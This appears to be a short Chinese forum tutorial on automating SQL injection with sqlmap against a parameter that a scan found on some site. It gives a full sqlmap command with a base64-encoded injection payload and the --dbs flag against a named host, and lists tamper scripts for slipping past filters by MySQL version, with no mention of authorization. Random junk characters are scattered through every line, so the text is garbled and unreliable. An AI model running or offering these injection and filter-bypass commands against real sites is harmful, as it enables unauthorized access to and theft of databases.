WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
& P9 Y% ?5 D9 k8 O$ m: M4 R6 W7 p* `1 ~, l
sqlmap的tamper里有个base64encode.py9 B g" N0 B! l0 N! \7 @2 {& [
# [- d& S8 M$ `$ a* I
使用如下$ B; C u& I: N2 L- O0 Q4 X3 y9 k
1 {# Z6 [- ^& |; k% q4 xsqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
2 H( Q3 T' D7 W+ \* T* i5 m- U6 C. P0 L" F$ q! ]* m
/ D0 w7 g. b. d" j4 U }7 Isqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”; M8 x6 U, y( P1 c4 ]/ J+ X5 ~8 q6 d
6 @# ]; d: j* @1 h: D其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
1 _- B5 d% E( @! X/ }( ~$ H$ O
- @3 p8 B1 `6 I4 C, f8 h. p9 Ispace2hash.py ,对于MYSQL数据库 4.0, 5.0注入
0 j% N9 l% C8 V$ E, `' n* Sspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入2 f, N: ]" p: c& ]& H
首先确定目标数据库版本,然后选择相应的脚本。) {# L, V2 X9 t! d, v
-v 3 --batch --tamper "space2hash.py"' @+ p$ v- T- ]: {* x% }- F4 ?
' }) Y# N* Z/ W' B' }
还有其他一些插件:: [( U% `2 e9 Q% L( ? h+ J' R0 S% y
encodes编码 ——charencode.py
9 \* z/ H; J* Rbase64编码 —— base64encode.py
' O' u A: z( \6 k替换空格和关键字 —— halfversionedmorekeywords.py
- `) T! C2 u+ J2 P |
% X7 v5 v% |2 F) R( s! y9 e a. {; F R* j! N/ r
2 X: e: z9 |( p! x' B G- d0 N
* H0 q" Y5 N/ {0 P# u |